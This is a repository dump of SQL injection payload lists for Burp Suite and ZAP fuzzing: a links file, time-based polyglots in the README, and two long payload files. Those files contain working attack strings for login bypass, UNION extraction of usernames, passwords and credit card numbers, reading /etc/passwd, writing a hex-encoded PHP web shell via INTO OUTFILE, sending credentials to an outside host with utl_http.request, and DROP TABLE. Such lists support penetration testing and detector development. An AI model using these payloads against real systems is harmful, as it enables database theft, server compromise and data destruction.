├── LINKS.md ├── README.md ├── sql-rmccurdy.com.txt └── sqli-misc.txt /LINKS.md: -------------------------------------------------------------------------------- 1 | ## LINKS: 2 | * https://github.com/danielmiessler/SecLists/tree/master/Fuzzing 3 | * https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection 4 | * https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad ; https://github.com/tennc/fuzzdb/tree/master/attack-payloads/sql-injection 5 | * https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Polyglots/SQLi_Polyglots.txt 6 | * https://github.com/1N3/IntruderPayloads ; https://github.com/1N3/IntruderPayloads/blob/master/burpattack_sqli_authbypass ; https://github.com/1N3/IntruderPayloads/blob/master/burpattack_sqli_error_based ; https://github.com/1N3/IntruderPayloads/blob/master/burpattack_sqli_time_based 7 | * https://github.com/foospidy/payloads ; https://github.com/foospidy/payloads/tree/master/other/sqli ; https://github.com/foospidy/payloads/tree/master/owasp/fuzzing_code_database/sqli ; https://github.com/foospidy/payloads/blob/master/owasp/jbrofuzz/sqli.txt 8 | * https://github.com/danTaler/detectionString 9 | * https://github.com/NickSanzotta/BurpIntruder 10 | * https://github.com/client9/libinjection/blob/master/data/sqli-misc.txt 11 | * https://rmccurdy.com/scripts/sql.txt 12 | * https://github.com/TeamMentor/TM_Temp_Scripts 13 | * https://github.com/arvinddoraiswamy/mywebappscripts/tree/master/FuzzLists 14 | * https://github.com/owtf/owtf/blob/develop/dictionaries/attack_vectors/web/sqli/basic.txt 15 | * 16 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SQL-Injection-Payloads 2 | SQL Injection Payloads for Burp Suite, OWASP Zed Attack Proxy,... 3 | 4 | ## POLYGLOTS: 5 | * avlidienbrunn 6 | * ```SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/``` 7 | * https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/ 8 | * ```IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/``` 9 | * ```IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/``` 10 | * bl4ckh4ck5 11 | * ```/*$(sleep 5)`sleep 5``*/-sleep(5)#'/*$(sleep 5)`sleep 5` #*/||sleep(5)||'"||sleep(5)||"` ``` 12 | * ```/*$(sleep 5)`sleep 5``*/sleep(5)#'/*$(sleep 5)`sleep 5` #*/||sleep(5)||'"||sleep(5)||"` ``` 13 | * geeknik 14 | * ```if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/``` 15 | * 16 | -------------------------------------------------------------------------------- /sql-rmccurdy.com.txt: -------------------------------------------------------------------------------- 1 | 1 OR 1=1 2 | 1\' OR \'1\'=\'1 3 | 1\'1 4 | 1 EXEC XP_ 5 | 1 AND 1=1 6 | 1\' AND 1=(SELECT COUNT(*) FROM tablenames); -- 7 | 1 AND USER_NAME() = \'dbo\' 8 | \\\'; DESC users; -- 9 | 1\\\'1 10 | 1\' AND non_existant_table = \'1 11 | \' OR username IS NOT NULL OR username = \' 12 | 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) > 116 13 | SQL Injection Cheet Sheet"},{"string": 14 | 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\' -- 15 | 1 UNI/**/ON SELECT ALL FROM WHERE 16 | %31%27%20%4F%52%20%27%31%27%3D%27%31 17 | 1' OR '1'='1 18 | 1' OR '1'='1 19 | -------------------------------------------------------------------------------- /sqli-misc.txt: -------------------------------------------------------------------------------- 1 | # 2 | # Misc collected attacks from the wild and beyond.... 3 | # 4 | SO_BUY+AND+IF%281%3D1%2CBENCHMARK%281589466%2CMD5%280X41%29%29%2C0%29 5 | SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27-- 6 | SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CDATABASE%28%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1 7 | SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CUNHEX%28HEX%28CAST%28DATABASE%28%29+AS+CHAR%29%29%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1 8 | PHPX+AND+1%3D1+AND+XX%3DX 9 | PHPX+AND+CHAR%28124%29+USER+CHAR%28124%29%3D0+AND+XX%3DX 10 | SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--%27 11 | SO_BUY%27%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27-- 12 | materials'%20and%201=1%20and%20''=' 13 | materials'%20and%201=2%20and%20''=' 14 | 1'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'=' 15 | -999.9'%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536%20and%20'x'='x 16 | 17 | # not sql 18 | #5000224%27%20UNION%20user_id%3E0-- 19 | 20 | -5000224%27%20UNION%20select%20user_id%20from%20users%20where%20user_id%3E0// 21 | 22 | # not sql 23 | #-5000224%27%20UNION%20user_id%3E0-- 24 | 5000224%27%20or%201=1-- 25 | 8+and+1=1-- 26 | 8+order+by+1-- 27 | 8-999.9+union+select+0 28 | 9-999.9+union+select+0-- 29 | 6334588%00%27%7C%7CSLEEP%283%29%26%26%271 30 | 6334588%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29 31 | 6334588%26%26SLEEP%283%29 32 | 6334588%27%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29%20AND%20%271 33 | 6334588%27%20AND%20SLEEP%283%29%20AND%20%271 34 | 6402272%27%20%61%6E%64%20%27%36%27%3D%27%356402272%27%20%61%6E%64%20%27%36%27%3D%27%366444930%20%61%6E%64%20%36%3D%35 35 | 6444930%20%61%6E%64%20%36%3D%36 36 | 6444930%27%20%61%6E%64%20%27%36%27%3D%27%35 37 | 6444930%27%20%61%6E%64%20%27%36%27%3D%27%36 38 | FOO%29%29+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29+AND+%28%283045%3D3045 39 | 1+%2B+%28SELECT+6744+FROM+DUAL+WHERE+3176%3D3176+AND+3761%3D5879%23+%29 40 | 1234.5%29+ORDER+BY+1 41 | FOO%2C%28SELECT+%28CASE+WHEN+%284831%3D4831%29+THEN+1+ELSE+1%2F%28SELECT+0%29+END%29%29 42 | FOO%29%3B+IF%28%286681%3D9099%29%2CSELECT+6681%2CDROP+FUNCTION+CGIQ%29%3B%23+AND+%284596%3D4596 43 | FOO%2C%28SELECT+%28CASE+WHEN+%284763%3D4974%29+THEN+FOO+ELSE+4763%2A%28SELECT+4763+FROM+MYSQL.DB%29+END%29%29 44 | FOO%29+WHERE+9060%3D9060+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29 45 | FOO%29%29%29+AND+3787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT+%28CASE+WHEN+%283787%3D3787%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29 46 | FOO+%2B+%28SELECT+9350+WHERE+8850%3D8850+AND+3963%3D4777--++%29 47 | FOO%29+AND+4499%3D8923%23 48 | FOO%2CIIF%282510%3D9436%2CFOO%2C1%2F0%29 49 | FOO%29%29%3B+IF%28%288708%3D3788%29%2CSELECT+8708%2CDROP+FUNCTION+RIHR%29%3B%23+AND+%28%286571%3D6571 50 | FOO%29%29%29%3B+IF%28%289256%3D5702%29%2CSELECT+9256%2CDROP+FUNCTION+IRII%29%3B%23+AND+%28%28%283502%3D350 51 | %28SELECT+2299%3D%28%27%3AJQA%3A%27%7C%7C%28SELECT+CASE+2299+WHEN+2299+THEN+1+ELSE+0+END+FROM+RDB%24DATABASE%29%7C%7C%27%3AUGJ%3A%27%29%29 52 | %28SELECT+2811+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280X3A6A71613A%2C%28SELECT+%28CASE+WHEN+%282811%3D2811%29+THEN+1+ELSE+0+END%29%29%2C0X3A75676A3A%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+X%29A%29 53 | FOO%2CEXTRACTVALUE%288571%2CCONCAT%280X5C%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%288571%3D8571%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%29 54 | %28CASE+WHEN+4518%3D5617+THEN+1+ELSE+NULL+END%29 55 | FOO%29%29%3B+SELECT+PG_SLEEP%285%29%3B-- 56 | FOO%29%29%29%3B+BEGIN+DBMS_LOCK.SLEEP%285%29%3B+END%3B--+AND+%28%28%288410%3D8410 57 | FOO%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%282114%3D2114 58 | FOO%29%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%28%281285%3D1285 59 | FOO+WAITFOR+DELAY+%270%3A0%3A5%27-- 60 | 1+order+by+1 61 | FOO%2C%28CAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT+%28CASE+WHEN+%281861%3D1861%29+THEN+1+ELSE+0+END%29%29%3A%3ATEXT%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29+AS+NUMERIC%29%29 62 | %28SELECT+GENERATE_SERIES%28FOO%2CFOO%2CCASE+WHEN+%289255%3D9830%29+THEN+1+ELSE+0+END%29+LIMIT+1%29 63 | -999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- 64 | 999999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL-- 65 | -999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27-- 66 | -999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- 67 | 999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- 68 | 999999.9+UNION+ALL+SELECT+CHR%28114%29%7C%7CCHR%2851%29%7C%7CCHR%28100%29%7C%7CCHR%28109%29%7C%7CCHR%2848%29%7C%7CCHR%28118%29%7C%7CCHR%2851%29%7C%7CCHR%2895%29%7C%7CCHR%28104%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%2895%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28106%29%7C%7CCHR%28101%29%7C%7CCHR%2899%29%7C%7CCHR%28116%29%7C%7CCHR%28105%29%7C%7CCHR%28111%29%7C%7CCHR%28110%29-- 69 | CAT1_GALLERY_1+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL-- 70 | 1 - ORD('A') 71 | TRUE DIV(SELECT ORD(LEFT 72 | TRUE DIV(SELECT (ORD(LEFT 73 | TRUE DIV(SELECT ((ORD(LEFT 74 | 1 DIV(SELECT ORD(LEFT 75 | 1 DIV(SELECT (ORD(LEFT 76 | 0 UNION SELECT (1),2,3 77 | 1 AND (SELECT TOP 10 USERNAME FROM USERS); 78 | 1 AND SELECT 1 FROM T.TRANS_DATE -- 1 79 | 1 AND (SELECT 1 FROM T.TRANS_DATE -- 1 80 | 1 GROUP BY 1 HAVING 1 = 1 81 | 1 GROUP BY 1 HAVING '1' = 1 82 | 1 GROUP BY 1,TRANSID,ACCOUNTID HAVING 1=1 83 | 1 AND SELECT TOP 10 USERNAME FROM USERS -- 1 84 | 1001 union(select userid, ccnumber, '3', '4' from credit_cards) 85 | 1001 union((select userid, ccnumber, '3', '4' from credit_cards)) 86 | 1001 union/*/**/*/select userid, ccnumber, '3', '4' from credit_cards 87 | 1001 or 'A' = 'B' union select userid, ccnumber, '3', '4' from credit_cards 88 | '6334588?'||SLEEP(3)&&'1 89 | 1001*/*!50000(1)union*/all(select 1,ccnumber,3,4 from credit_cards) 90 | 1001*/*!50000(1)union select 1,ccnumber,load_file('/etc/passwd'),4 from credit_cards*/ 91 | (1001)union select-1,ccnumber,3,4 from credit_cards 92 | (1001)union select (1),ccnumber,3,4 from credit_cards 93 | (1001)union select @a,ccnumber,3,4 from credit_cards 94 | 1001-\N%0aunion select 1,ccnumber,3,4 from credit_cards 95 | 1001 sounds like '1001' union select 1,ccnumber,3,4 from credit_cards 96 | 1001-'text' union select 1,ccnumber,3,4 from credit_cards 97 | 1001%2b@a union select 1,load_file('/etc/passwd'),3,4 from credit_cards 98 | ((1001)-1) union select 1,2,3,4 from credit_cards 99 | 1001'-@a union select 1,2,3,4 from credit_cards-- - 100 | '1001'-@a union select 1,2,3,4 from credit_cards 101 | ((1001)-1) union select 1,2,3,4 from credit_cards 102 | 1001 rlike(-1)union select 1,2,3,4 from credit_cards 103 | ## 1001 ----1 union select 1,2,3,4 from credit_cards 104 | 1001 or 'foo' union select 1,2,3,4 from credit_cards 105 | 1001 and @a union select 1,2,3,4 from credit_cards 106 | 1001 like @a-1 union select 1,2,3,4 from credit_cards 107 | 1001-\N-\N union select 1,2,3,4 from credit_cards 108 | (1001-\N-\N) union select 1,2,3,4 from credit_cards 109 | (1001-\N)-\N union select 1,2,3,4 from credit_cards 110 | 1001-\N union select 1,2,3,4 from credit_cards 111 | 1001-true union select 1,2,3,4 from credit_cards 112 | (1001-true) union select 1,2,3,4 from credit_cards 113 | (1001-'1') union select 1,2,3,4 from credit_cards 114 | (1001-@version) union select 1,2,3,4 from credit_cards 115 | 1-(1001-true) union select 1,2,3,4 from credit_cards 116 | 1001-false-false union select 1,2,3,4 from credit_cards 117 | 1001-false-NULL union select 1,2,3,4 from credit_cards 118 | 1001 rlike(1-NULL)union select 1,2,3,4 from credit_cards 119 | 1001 rlike(1-(NULL))union select 1,2,3,4 from credit_cards 120 | (1)-'1' union select 1,2,3,4 from credit_cards 121 | (1)-@version union select 1,2,3,4 from credit_cards 122 | (@version)-@version union select 1,2,3,4 from credit_cards 123 | (@version)-1 union select 1,2,3,4 from credit_cards 124 | (@version)-'1' union select 1,2,3,4 from credit_cards 125 | @version-@version union select 1,2,3,4 from credit_cards 126 | @version-1 union select 1,2,3,4 from credit_cards 127 | @version-'1' union select 1,2,3,4 from credit_cards 128 | ('1')-'1' union select 1,2,3,4 from credit_cards 129 | 1001 rlike(-1-1)union select 1,2,3,4 from credit_cards 130 | 1001 rlike(1-1)union select 1,2,3,4 from credit_cards 131 | 1001 rlike(@version)union select 1,2,3,4 from credit_cards 132 | 1001 rlike(@version-1)union select 1,2,3,4 from credit_cards 133 | 1001 rlike(1-@version)union select 1,2,3,4 from credit_cards 134 | 1001 rlike('1')union select 1,2,3,4 from credit_cards 135 | # vv new variations 2013-04-10 nickg vv 136 | 1001 RLIKE ((1)) UNION SELECT 1 FROM CREDIT_CARDS 137 | 1001 RLIKE ((-1)) UNION SELECT 1 FROM CREDIT_CARDS 138 | 1001 RLIKE ((-"1")) UNION SELECT 1 FROM CREDIT_CARDS 139 | 1001 RLIKE (-(1)) UNION SELECT 1 FROM CREDIT_CARDS 140 | 1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS 141 | 142 | # http://vagosec.org/2013/04/mysql-implicit-type-conversion/ 143 | # a'+'b encoded is a%27%2B%27b 144 | a%27%2B%27b 145 | ' OR 1='1 146 | 147 | # new variations 148 | X' != 'Y' = 0 = '1 149 | X' = 'X' = 0 = '1 150 | X' = 'X' = 'X' = 0 = '1 151 | X' - 'Y' - 0 = '1 152 | 153 | # part of parameter pollution 154 | 1) FROM USERS WHERE USERNAME= 155 | 156 | # nest pgsql mssql comments 157 | 1/* /*/ */ */ or 1=1- 158 | 1/* /* / */ */ or 1=1- 159 | 160 | # small sqli 161 | 1-- 162 | 1 -- 163 | 1 -- 164 | 1/* 165 | 1 /* 166 | 1 /* 167 | 1*1-- 168 | 1 * 1-- 169 | 1 * 1 -- 170 | 1*1/* 171 | 1 * 1/* 172 | 1 * 1 /* 173 | 1 * 1 /* 174 | @version-- 175 | @@version-- 176 | @version -- 177 | @version /* 178 | @version/* 179 | 180 | # thanks @d0znpp 181 | (select id from users limit 1,1) 182 | (select id-0 from users limit 1,1) 183 | # known bypass.. for now! 184 | (select id,id,id,id from users limit 1,1) 185 | 186 | # some variations 187 | '1' union (select id from users limit 1,1) 188 | 1 union (select id from users limit 1,1) 189 | xxx union (select id from users limit 1,1) 190 | @version union (select id from users limit 1,1) 191 | 192 | '1' union (select 1 from users limit 1,1) 193 | 1 union (select 1 from users limit 1,1) 194 | xxx union (select 1 from users limit 1,1) 195 | @version union (select 1 from users limit 1,1) 196 | 197 | '1' union (select xxx from users limit 1,1) 198 | 1 union (select xxx from users limit 1,1) 199 | xxx union (select xxx from users limit 1,1) 200 | @version union (select xxx from users limit 1,1) 201 | 202 | '1' union (select 's' from users limit 1,1) 203 | 1 union (select 's' from users limit 1,1) 204 | xxx union (select 's' from users limit 1,1) 205 | @version union (select 's' from users limit 1,1) 206 | 207 | # thanks @LightOS 208 | -1 union(((select table_name from information_schema.tables limit 1,1))) 209 | '1' union(((select table_name from information_schema.tables limit 1,1))) 210 | @foo union(((select table_name from information_schema.tables limit 1,1))) 211 | id union(((select table_name from information_schema.tables limit 1,1))) 212 | 213 | # and again @LightOS 214 | test'-1/1/**/union(select table) 215 | test'-1 union(select table) 216 | test'-@version union (select table) 217 | test'-'xyz' union (select table) 218 | 1- @version union(select table_name from information_schema.tables limit 1,1) 219 | 1- 'xxx' union(select table_name from information_schema.tables limit 1,1) 220 | 1- union(select table_name from information_schema.tables limit 1,1) 221 | @version - @version union(select table_name from information_schema.tables limit 1,1) 222 | @version- 'xxx' union(select table_name from information_schema.tables limit 1,1) 223 | @version - 5 union(select table_name from information_schema.tables limit 1,1) 224 | 225 | # 226 | 1 into outfile 'asd' 227 | 1 into outfile 'asd'-- 228 | '1' into outfile 'asd' 229 | '1' into outfile 'asd' -- 230 | @version into outfile 'asd' 231 | @version into outfile 'asd' -- 232 | 233 | 1 into outfile ('asd') 234 | '1' into outfile ('asd') 235 | @version into outfile ('asd') 236 | 237 | 1 into outfile substring('asd', 10, 1) 238 | '1' into outfile substring('asd', 10, 1) 239 | @version into outfile substring('asd', 10 1) 240 | 241 | 1 into outfile (substring('asd', 10, 1)) 242 | '1' into outfile (substring('asd', 10, 1)) 243 | @version into outfile (substring('asd', 10 1)) 244 | 245 | %28select+substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom+users+limit+1%2C1%29 246 | union%20%28select+id+from+users+limit+1%2C1%29 247 | 248 | # 249 | # This is not valid SQL but designed to force a syntax error 250 | # http://www.modsecurity.org/testphp.vulnweb.com/listproducts.php?cat=1%0Aand+current_user=notthere() 251 | 1%0Aand+current_user=notthere() 252 | 1%0Aand+current_user=1 253 | 1%0Aand+current_user=@version 254 | 1%0Aand+current_user='junk' 255 | 1%0Aand+current_user=foo 256 | 257 | 258 | 259 | 1--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29 260 | 1'--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29 261 | @version--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29 262 | 263 | -.1a%20union%20%28select+id+from+users+limit+1%2C1%29 264 | 265 | case 1 when 2 then 2 end 266 | case sin(1) when 2 then 2 end 267 | case '1' when 2 then 2 end 268 | case 1 when 's' then 2 end 269 | case when 2 then 3 end 270 | case when 's' then 3 end 271 | case when f(1) then 3 end 272 | 273 | -1 union select table_name asda from information_schema.tables 274 | -1 union select table_name "asda" from information_schema.tables 275 | -1 union select table_name `asda` from information_schema.tables 276 | -1 union select table_name as asda from information_schema.tables 277 | -1 union select table_name as "asda" from information_schema.tables 278 | -1 union select table_name as `asda` from information_schema.tables 279 | 280 | a'and(select(binary(/*!system_user()*/)))like'reading%25 281 | 282 | -1 union select @``"", table_name from information_schema.tables 283 | 'foo' union select @``"", table_name from information_schema.tables 284 | @version union select @``"", table_name from information_schema.tables 285 | 286 | select @version foo 287 | select @version "foo" 288 | select @version foo -- junk 289 | select @version "foo" -- junk 290 | 291 | $$pgsql evade$$ union select * from foo 292 | $foo$pgsql evade$foo$ union select * from foo 293 | 294 | u&'pgsql evade' union select * from foo 295 | U&'pgsql evade' union select * from foo 296 | 297 | U&'pgsql evade' uescape '!' union select * from foo 298 | 299 | _latin1'foo' union select * from foo 300 | _LATIN7'foo' union select * from foo 301 | _utf8'foo' union select * from foo 302 | 303 | REAL 1 union select * from foo 304 | 1::REAL union select * from foo 305 | 1::REAL::REAL union select * from foo 306 | 307 | -1 union select @``"", table_name from information_schema.tables 308 | !~1 union select table_name from information_schema.tables 309 | -1 union select @a`from 1`, table_name from information_schema.tables 310 | version() union select table_name from information_schema.tables 311 | -1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables 312 | 1 is unknown union select table_name from information_schema.tables 313 | true is not unknown for update union select table_name from information_schema.tables 314 | 1 for update union select 1 315 | 316 | # ht/ TK 317 | (true)-(true)union select table_name from information_schema.tables 318 | (@a)-(@a)union select table_name from information_schema.tables 319 | 320 | # ht/ @stamparm 321 | 1 OR (1 OR 1)-- 322 | (1) OR (1 OR 1)-- 323 | ((1) OR (1 OR 1))-- 324 | ((1) OR ((1 OR 1)))-- 325 | 1 OR ((1 OR 1)) -- 326 | 1 OR ((1) OR 1) -- 327 | 328 | # ht/ @stamparm 329 | (@x OR @y) UNION ALL SELECT name,email,password FROM users-- 330 | (@x OR (@y)) UNION ALL SELECT name,email,password FROM users-- 331 | ((@x) OR @y) UNION ALL SELECT name,email,password FROM users-- 332 | (@x) OR (@y) UNION ALL SELECT name,email,password FROM users-- 333 | @x) OR (@y) UNION ALL SELECT name,email,password FROM users-- 334 | @x OR (@y) UNION ALL SELECT name,email,password FROM users-- 335 | 336 | # ht/ @stamparm 337 | (SELECT 1 FROM DUAL) 338 | (SELECT @a FROM DUAL) UNION ALL SELECT 1, 2, 3-- 339 | (SELECT (1) FROM DUAL) 340 | (select @version from dual) 341 | (select (@version - 1) from dual) 342 | (select ('foo' - 1) from dual) 343 | (select 'foo' from dual) 344 | (select 1 foobar from dual) 345 | 346 | # previously had problems with operators made from two words 347 | # ht/@stamparm 348 | 1 and 1 not between 0 and 1 349 | 1 AND 1 SOUNDS LIKE 1 350 | 1 AND 1 NOT LIKE 0 351 | 352 | (1 AND 1) OR 2>1-- 353 | 354 | # ht/@FluxReiners 355 | '-(1 or 1) and 1=0 union select load_file('/etc/passwd'),credit_card,password from users-- - 356 | '-(-1 or -1) and 1=0 union 357 | '-(-(1) or -1) and 1=0 union 358 | '-((1) or -1) and 1=0 union 359 | 360 | # https://twitter.com/dsrbr/status/342132003270959104 361 | -1 union select null, listagg(login || ':' || pass,', ') within group (order by login) from users; 362 | -1 union select null, xmlagg(xmlelement("user",login || ':' || pass).getStringVal() from users; 363 | -1 union select null, stragg(login || ':' || pass ||', ') from users; 364 | 365 | -1 union select listagg(login || ':' || pass,', ') within group (order by login) from users; 366 | 367 | #ht ivan 368 | users.id%0D%0A%23asd%0D%0Aunion%0D%0A%23asd%0D%0Aselect%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aaa+%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Afrom%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aasdasd 369 | 370 | # http://samincube.blogspot.ru/2013/06/time-based-sqli-on-google-coupon.html 371 | 1'=sleep(1)='1 372 | 373 | # https://twitter.com/dsrbr/status/343017094926962691 374 | 1 and select (utl_http.request('http://client9.com/') || select listagg(login || chr(58) || pass || ', ') within group (order by login) from dual) is not null; 375 | 376 | # https://twitter.com/dsrbr/status/341228356936814592 377 | -1 union select top 1 null, lead(pass, 0) over (order by pass) from users; 378 | 379 | # https://twitter.com/dsrbr/status/340018970054766592 380 | -1 union select null, array_to_json(array_agg(users))::text from users limit 1; 381 | 1 and (select array_to_json(array_agg(users))::text::bool from users limit 1; 382 | 383 | # http://www.exploit-db.com/exploits/25915/ 384 | ' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e,null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE 'afile.php' 385 | 386 | # http://blog.detectify.com/post/51651525114/the-ultimate-sql-injection-payload 387 | IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ 388 | 389 | # misc secondary sql statements 390 | 1 and true; BEGIN DECLARE @xy varchar(8000) 391 | 1; BEGIN DECLARE @xy varchar(8000) 392 | x' and 1 = 0; BEGIN DECLARE 393 | x' AND 1=0; DROP TABLE TMP_DB; 394 | ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S 395 | 396 | ' IF 